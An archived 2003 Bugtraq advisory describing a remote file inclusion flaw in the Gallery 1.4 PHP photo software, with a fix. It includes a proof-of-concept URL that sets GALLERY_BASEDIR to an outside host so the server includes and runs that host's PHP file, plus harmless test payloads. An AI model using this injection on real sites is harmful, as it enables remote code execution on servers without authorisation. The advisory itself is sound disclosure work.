lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20031011161300.23724.qmail@sf-www3-symnsj.securityfocus.com>
Date: 11 Oct 2003 16:13:00 -0000
From: Peter "Stöckli" <pcs@...tquest.com>
To: bugtraq@...urityfocus.com
Subject: Gallery 1.4 including file vulnerability




Gallery 1.4 including file vulnerability

-Background Information-
Gallery is a Web-based software product that lets you manage photos on any Web site that offers PHP support. With Gallery you can easily create and maintain albums of photos via an intuitive interface. Photo management includes automatic thumbnail creation, image resizing, rotation, ordering, captioning, searching, and more. Albums can have read, write, and caption permissions per individual authenticated user for an additional level of privacy. Gallery is installed on maybe 20000 Locations.

-Proof of concept-
It is possible to include any php file from a remote host, and execute it on the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php" exists, it will be included. This file could look like this if PHP isn't supported on the "tester"-host:

<?php echo "Vulnerable"; ?>

or like this, if PHP is supported on the "tester"-host:

<?php
echo "<?php die(\"Vulnerable\"); ?>";
?>

-Solution-
Change the following Lines in the index.php files in the setup folder:

if (!isset($GALLERY_BASEDIR)) {
	$GALLERY_BASEDIR = '../';
}

to this:

	$GALLERY_BASEDIR = '../';

-Related URLs-
http://gallery.sourceforge.net/
https://sourceforge.net/projects/gallery/

Peter Stöckli
RQ Labs
Rootquest
Switzerland


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ